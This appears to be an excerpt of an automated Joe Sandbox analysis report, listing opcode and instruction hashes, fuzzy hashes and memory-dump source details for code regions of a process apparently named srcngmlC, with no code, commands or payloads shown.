                                                                                                                                            • Opcode ID: a119208b4dfef0a6b02fec35afb70e2d54e3b0c9cb0baa29427892b3853fbfbe
                                                                                                                                            • Instruction ID: 1abb1351985593a34f153d4c23880ef65041ac3607c30be9c89974de28e9dba4
                                                                                                                                            • Opcode Fuzzy Hash: a119208b4dfef0a6b02fec35afb70e2d54e3b0c9cb0baa29427892b3853fbfbe
                                                                                                                                            • Instruction Fuzzy Hash: 9801AD35B000105BE704966D9855B0BB7DBEBC9754F14883AE00EE7741EE25EC428385
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LR^q
                                                                                                                                            • API String ID: 0-2625958711
                                                                                                                                            • Opcode ID: 86b42b32a5020c94da80258f70303b34125e3170b309884d89722db1f429dac6
                                                                                                                                            • Instruction ID: 8fc397f50271b702dc58f8a3767c5390ef00e6caefc0d937c7a2dfe0cac62915
                                                                                                                                            • Opcode Fuzzy Hash: 86b42b32a5020c94da80258f70303b34125e3170b309884d89722db1f429dac6
                                                                                                                                            • Instruction Fuzzy Hash: 2BF0AF35B00114AFC709AB78906466E76E7EBC9715F2085AEE00EDB360DF3198468792
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: da0aa225e9ff6c5283de40d1c6bdb8c0c98d66e56839794ed48ead17160ab5e6
                                                                                                                                            • Instruction ID: 7f7b3c57ba753dbbd8a96ae17b232673c74b54e48012e8d3d59eeeed24f8d890
                                                                                                                                            • Opcode Fuzzy Hash: da0aa225e9ff6c5283de40d1c6bdb8c0c98d66e56839794ed48ead17160ab5e6
                                                                                                                                            • Instruction Fuzzy Hash: D761D375F000214FDB049A7EC89456FBAE7AFD8654B25403AE80ED7364DE65EC0387D2
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3a5fc04226b9cf5e16442b3b93fb41b749ab3e203f72d57da939f1ca5978bb10
                                                                                                                                            • Instruction ID: 6fbd26bfb5287fca80ae41d122104fe2c46e75463934539138e1661ec8f242c4
                                                                                                                                            • Opcode Fuzzy Hash: 3a5fc04226b9cf5e16442b3b93fb41b749ab3e203f72d57da939f1ca5978bb10
                                                                                                                                            • Instruction Fuzzy Hash: DC819F75A012058FDB04CFA9D984B9DBBF6FF88314F14C1A9E908AB395DB70E845CB90
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 69ef7795789e85e2dd52b7931563caefe7ca64ac34082b82564080a64d62dcfa
                                                                                                                                            • Instruction ID: 376a27041db0610bc1b1f63b34d4ee36ac038f4f071537a5f317978aef8caa6f
                                                                                                                                            • Opcode Fuzzy Hash: 69ef7795789e85e2dd52b7931563caefe7ca64ac34082b82564080a64d62dcfa
                                                                                                                                            • Instruction Fuzzy Hash: B2618534E103498BEB00DBA8C890BDDB7B2FF85314F119929E549FF294EB74A985C741
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: db992c2ab914bdbd6c32d8c34ea21b2e7352c5f73f36287a44e0e0bc38400b01
                                                                                                                                            • Instruction ID: 8be3d81bed01888e4a4c441481495d063280d6ff1ad27d218207b4464b348f36
                                                                                                                                            • Opcode Fuzzy Hash: db992c2ab914bdbd6c32d8c34ea21b2e7352c5f73f36287a44e0e0bc38400b01
                                                                                                                                            • Instruction Fuzzy Hash: 86617534E103498BEB04DBA8C890B9DB7B2FF85314F119929E549FF294EB74A985C781
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e114fddbad391eb82a9fa89d7cb1cdeb7f14e47682cd0e23807a521f4b77f0d4
                                                                                                                                            • Instruction ID: dfea2ea22913f73032b8ac8a3aea7c5fac7b5be1d4e9fbaac73b1c46c29444b4
                                                                                                                                            • Opcode Fuzzy Hash: e114fddbad391eb82a9fa89d7cb1cdeb7f14e47682cd0e23807a521f4b77f0d4
                                                                                                                                            • Instruction Fuzzy Hash: A85103B5D002598FDB04CFA9C884B9DFBB1BF48314F50951AE81ABB3A0D774A945CF91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: cc5334797f1f5f6c82f47e0ac89ceda045282c7ebb43890b1ff4b20cb99d2383
                                                                                                                                            • Instruction ID: 904392ee019eab565c558e3e6ead39eabce2e2cb32373a989a9c7d89d8916415
                                                                                                                                            • Opcode Fuzzy Hash: cc5334797f1f5f6c82f47e0ac89ceda045282c7ebb43890b1ff4b20cb99d2383
                                                                                                                                            • Instruction Fuzzy Hash: 755114B5D002598FDB04CFA9C884B9DFBB1BF48314F509519E819BB3A0DB74A945CF91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8036706f08ed1ddafd5126972ad31f48d8ea0c5453615a580442147aa0a4dfbd
                                                                                                                                            • Instruction ID: bebe04251177bc0d28af6d16d2b2a9bc1b7e71548fe750e8f7640416df84a227
                                                                                                                                            • Opcode Fuzzy Hash: 8036706f08ed1ddafd5126972ad31f48d8ea0c5453615a580442147aa0a4dfbd
                                                                                                                                            • Instruction Fuzzy Hash: 9C417F75A416058FEB20CFA9D8C0AAFF7F2FB84314F10592AE146D7654D730B9458B91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c75bd18bb5bffd292ccbb8457a849e15408457a55b4adebac875343b075ba9b9
                                                                                                                                            • Instruction ID: dc5d4ca4ad3eb714ed453128dbd8606487244cd07fb97c98deddef78d1ffe449
                                                                                                                                            • Opcode Fuzzy Hash: c75bd18bb5bffd292ccbb8457a849e15408457a55b4adebac875343b075ba9b9
                                                                                                                                            • Instruction Fuzzy Hash: 0341A278A411868BEB208B68C4C0B6FBBB2FB45358F20592AD055D7781D734FD91CB91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: dc73915635348d86df82297534201af38113632b6547259f81ede3691c044531
                                                                                                                                            • Instruction ID: fced15e9bef84b7bae807ea7cadad31424cf25551d8acf82a9351580ecacae9c
                                                                                                                                            • Opcode Fuzzy Hash: dc73915635348d86df82297534201af38113632b6547259f81ede3691c044531
                                                                                                                                            • Instruction Fuzzy Hash: 1E21477AE0A2908FEB01CBA4DD44B9A7BE5FF85214F1484AAE404EB292D330A944C7D0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1c64a630850ee49bbb1049147728da1e3047cb71e7e56350b8fdebd1f5acef88
                                                                                                                                            • Instruction ID: 880499d2f3755cbd29694fd39f1453a8ac1b97e42b3dc222862cb573c36073b1
                                                                                                                                            • Opcode Fuzzy Hash: 1c64a630850ee49bbb1049147728da1e3047cb71e7e56350b8fdebd1f5acef88
                                                                                                                                            • Instruction Fuzzy Hash: 65216B75F016159FDB00DF69D880AAEBBF1FB88618F109829E905F7350EB30E9428B94
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6fca74b90e0a4e7c8e8289f3724ec203e3a2b8680f3ed1c64c4a0c417af5c0cd
                                                                                                                                            • Instruction ID: 813011d977b5aabf1f0177afce1e0a4dd8659fb4adaaf38d31734ac2e9aac230
                                                                                                                                            • Opcode Fuzzy Hash: 6fca74b90e0a4e7c8e8289f3724ec203e3a2b8680f3ed1c64c4a0c417af5c0cd
                                                                                                                                            • Instruction Fuzzy Hash: 07214C75F016159FDB00DF78D980AAEBBF1FB48618F119829E905F7350EB34E9428B91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1875026692.000000003003D000.00000040.00000800.00020000.00000000.sdmp, Offset: 3003D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_3003d000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 608b725f436cd1461817c1586f5e8c39edcb23ff229bd057a00ba4f0380cc8af
                                                                                                                                            • Instruction ID: 3cdc6417e8babfdec03aa6967601f40d466896bda86461d8aab9ec42f3c79f8a
                                                                                                                                            • Opcode Fuzzy Hash: 608b725f436cd1461817c1586f5e8c39edcb23ff229bd057a00ba4f0380cc8af
                                                                                                                                            • Instruction Fuzzy Hash: 71210679501704DFDB02DF14E9C0F1ABFA5FB98318F2485EAD9044B256C336D856DAA2
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1875196388.000000003015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 3015D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_3015d000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 35e326cac54c2935a2a14ca137d1ccc8d2ac3cba6bab9a434862ff60af997628
                                                                                                                                            • Instruction ID: 6069f2d3aed816748936d94f724689f1d08bd618918e2495fbf214bed51809a4
                                                                                                                                            • Opcode Fuzzy Hash: 35e326cac54c2935a2a14ca137d1ccc8d2ac3cba6bab9a434862ff60af997628
                                                                                                                                            • Instruction Fuzzy Hash: 7A21F2B9504304DFEB20DF24C9C4B16BBA5EB84314F24C5A9E8594F291CB3AD84ACB61
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ecec9e8715ba097bb3cad74f366292332010adefd1da0e4f381bc22a9f2c02ff
                                                                                                                                            • Instruction ID: fa20727d6b5a77fe4ed581aaeb2062ad4c45d4621aeba936205a3e45b55fc1bc
                                                                                                                                            • Opcode Fuzzy Hash: ecec9e8715ba097bb3cad74f366292332010adefd1da0e4f381bc22a9f2c02ff
                                                                                                                                            • Instruction Fuzzy Hash: 69116535B105299FDB049668D854AAE73EABBC8355B018935D40EFB344DE64EC038B91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1875026692.000000003003D000.00000040.00000800.00020000.00000000.sdmp, Offset: 3003D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_3003d000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
                                                                                                                                            • Instruction ID: d06683d4e0fb5d4ecb41486e59fa26013174cb0c80cd1562572724547a8748eb
                                                                                                                                            • Opcode Fuzzy Hash: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
                                                                                                                                            • Instruction Fuzzy Hash: C811B17A505644CFDB02CF10D5C4B06BFB2FB94314F24C6EAD8094B256C336D85ACBA1
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0b3271f254b24e9e237885b71bd22190e2c1c1f281da7d3adc507f8c81647b4b
                                                                                                                                            • Instruction ID: 6d4822e4a2b2788b32527f36907263cbd4304c078c48b249ef022d6f728aa6f8
                                                                                                                                            • Opcode Fuzzy Hash: 0b3271f254b24e9e237885b71bd22190e2c1c1f281da7d3adc507f8c81647b4b
                                                                                                                                            • Instruction Fuzzy Hash: 0421E0B5900259ABCB00DF9AD884ADEFBB4FB48314F10852AE918B7200C374A940CFA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3966b8f238b0cf23b14c378319147a4d90a33a6cd57901aa49f62b1069bc9f9a
                                                                                                                                            • Instruction ID: 08d1a534b6939b318e18dcbd7d5b097a5cab32ed04f63153737cc1c29da9ed65
                                                                                                                                            • Opcode Fuzzy Hash: 3966b8f238b0cf23b14c378319147a4d90a33a6cd57901aa49f62b1069bc9f9a
                                                                                                                                            • Instruction Fuzzy Hash: 8B21C0B5D01659EFCB00DF9AD985ACEFBF4FB49314F10852AE918A7210C374A950CFA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1875196388.000000003015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 3015D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_3015d000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 021c8d7180bca40b1b4a0da321e6e5f783d7625571517dbbd39f1422581fcb41
                                                                                                                                            • Instruction ID: e0300b5d10e0a531bcaaf203ad6a8250e468fb3798fb101f9587f4c541136ee9
                                                                                                                                            • Opcode Fuzzy Hash: 021c8d7180bca40b1b4a0da321e6e5f783d7625571517dbbd39f1422581fcb41
                                                                                                                                            • Instruction Fuzzy Hash: C7119079504644DFDB11CF10D5C4B05BFA1FB44314F24C6A9E8494F696C33AD84ACF51
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d3b31991f67f19f1e39c6646f0a202c64f66dc38319d04359eef3cac14349c3e
                                                                                                                                            • Instruction ID: 6b6cacb69e55742870a94ecb6122577dabccbad25f99fe20e4cf5bc5bf98c2df
                                                                                                                                            • Opcode Fuzzy Hash: d3b31991f67f19f1e39c6646f0a202c64f66dc38319d04359eef3cac14349c3e
                                                                                                                                            • Instruction Fuzzy Hash: 9A01F27AB101245BEB149668C914BAF33EBABC8605F01883AC00EF7344EF60AC0247D1
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1875026692.000000003003D000.00000040.00000800.00020000.00000000.sdmp, Offset: 3003D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_3003d000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 35e7d813d577ada5351146e2d28c494b02a5b3dd20e7e90ece038335f7e5a8a5
                                                                                                                                            • Instruction ID: 2f9dcc808a3dbfb3adf1cfb5c1e53e8f3a5238a5c8ffc0b35ffb583fa8d837da
                                                                                                                                            • Opcode Fuzzy Hash: 35e7d813d577ada5351146e2d28c494b02a5b3dd20e7e90ece038335f7e5a8a5
                                                                                                                                            • Instruction Fuzzy Hash: 87016D7540E3809FD7034B259C94752BFB8EF43624F0984CBE8988F1A3C2695C45CB71
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1875026692.000000003003D000.00000040.00000800.00020000.00000000.sdmp, Offset: 3003D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_3003d000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fe40e47ea2b82e4a7b903cef03fcd0871e9ba428126ed21d70c110ac9720125a
                                                                                                                                            • Instruction ID: b4fad4d26ee8551fc1e67a433f314236dd9335cb9434e9e5455b61b420cd8682
                                                                                                                                            • Opcode Fuzzy Hash: fe40e47ea2b82e4a7b903cef03fcd0871e9ba428126ed21d70c110ac9720125a
                                                                                                                                            • Instruction Fuzzy Hash: 1C01F77940A3009AE3164E25D980B57BFD8DF41765F18C4EBED280A146C679D841CAB1
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 05fec1afd4bca2b7500029c057d90c66e64d8e6d6ce9a7afe030eba6d9e75006
                                                                                                                                            • Instruction ID: 60fd3440b65d4b1d65c2af9fa337474577d448c9f11dba04e7dfd716c89b9754
                                                                                                                                            • Opcode Fuzzy Hash: 05fec1afd4bca2b7500029c057d90c66e64d8e6d6ce9a7afe030eba6d9e75006
                                                                                                                                            • Instruction Fuzzy Hash: 6B019271A21A099FCB067F78D4184AD3B75FF85301B00861BF545B7220EF309596DBC2
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9f22033e36ff33ae0a287d91cb257f1535056464c503ee51acab8acd9ab0e03a
                                                                                                                                            • Instruction ID: 3ab231679485e4a3b87343d43b52ce7a0b4c9567b8b060a9b09ee5cfd81c22ba
                                                                                                                                            • Opcode Fuzzy Hash: 9f22033e36ff33ae0a287d91cb257f1535056464c503ee51acab8acd9ab0e03a
                                                                                                                                            • Instruction Fuzzy Hash: FF017C36521A4DDFCB02BF78E8184AD7B70FF85641B00825BF54977120EF30A296DB92
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0b453dd0e225e9693b1ce90727a7ac1142024dab8354ee0a1aa235a2e1664d9b
                                                                                                                                            • Instruction ID: fb268a58ff94d53e4fa87431d8afec778519a9427f43a718eccc2e3ea6d6d745
                                                                                                                                            • Opcode Fuzzy Hash: 0b453dd0e225e9693b1ce90727a7ac1142024dab8354ee0a1aa235a2e1664d9b
                                                                                                                                            • Instruction Fuzzy Hash: 58012978A00244CFD704DB70C558B5C77B2FB89329F505499E40BAB2A5CF39AC82CB55
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 31fd3ac99d543d9e40bfd73ce3309a6ed455f563e18a4e4aaaae4d1cfb7136d1
                                                                                                                                            • Instruction ID: 4bed6ca9b87235a2daaafa02f1fc6b4532c50900246199b5efadc03181d2a0b9
                                                                                                                                            • Opcode Fuzzy Hash: 31fd3ac99d543d9e40bfd73ce3309a6ed455f563e18a4e4aaaae4d1cfb7136d1
                                                                                                                                            • Instruction Fuzzy Hash: 3201D8B45421096FCB05D7B8DA8099DBFB5FF41344B4086E8D0056F26ACF712E8687D2
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4e2cb692f88ff18c6627f7007837908243f976af8ee0c711af3c9c8a146b9c69
                                                                                                                                            • Instruction ID: 67521ecf362ab22120c2594d0b1bdfe30b8cc3d7539878bc9e25ff3601ba3a66
                                                                                                                                            • Opcode Fuzzy Hash: 4e2cb692f88ff18c6627f7007837908243f976af8ee0c711af3c9c8a146b9c69
                                                                                                                                            • Instruction Fuzzy Hash: 99F0C875B042449FEB00DAA4E94568E7BB5EF4125CF118466D909D7305D671EA068780
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c807505d6e245abb403dea6bfaeeca88a7d77604f0fbb766ad69468fc63d41dc
                                                                                                                                            • Instruction ID: c492ce101fdddf49d73dc3591ecd9e3dc97ad45ce7ba2208c4eb1837fcba82cd
                                                                                                                                            • Opcode Fuzzy Hash: c807505d6e245abb403dea6bfaeeca88a7d77604f0fbb766ad69468fc63d41dc
                                                                                                                                            • Instruction Fuzzy Hash: 01013674941109AFDF04EBF8E99099DB7B5FB40304F5086B5C0056B259DF716F8A87D1
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
